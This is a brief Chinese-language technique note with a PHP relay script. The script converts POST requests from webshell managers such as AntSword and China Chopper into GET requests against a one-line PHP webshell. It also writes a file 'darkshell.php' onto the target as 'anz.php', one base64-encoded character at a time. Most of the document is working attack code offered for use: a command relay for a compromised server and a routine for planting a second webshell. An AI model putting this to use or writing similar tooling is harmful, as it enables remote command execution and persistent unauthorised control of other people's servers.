GET->POST

请求转化

由于蚁剑菜刀均是利用POST进行命令执行

只要把POST改为GET请求即可

如下脚本

<?php
highlight_file(__FILE__);
ini_set('max_execution_time', '100'); // 超时时间

$url = 'http://localhost/test/rce.php'; // 一句话地址
$pass = '2'; // 密码
$data = $_POST['cmd']; // 中转密码

echo file_get_contents($url.'?'.$pass.'='.$data);

if(isset($_GET['upload'])){
    $f = fopen('darkshell.php','r'); // 上传文件
    while (!feof($f)){
        $content = base64_encode(fgetc($f));
        $exec = "file_put_contents('anz.php',base64_decode('$content'),FILE_APPEND);";
        file_get_contents($url.'?'.$pass.'='.$exec);
    }
    echo 'File uploaded successfully';
}
?>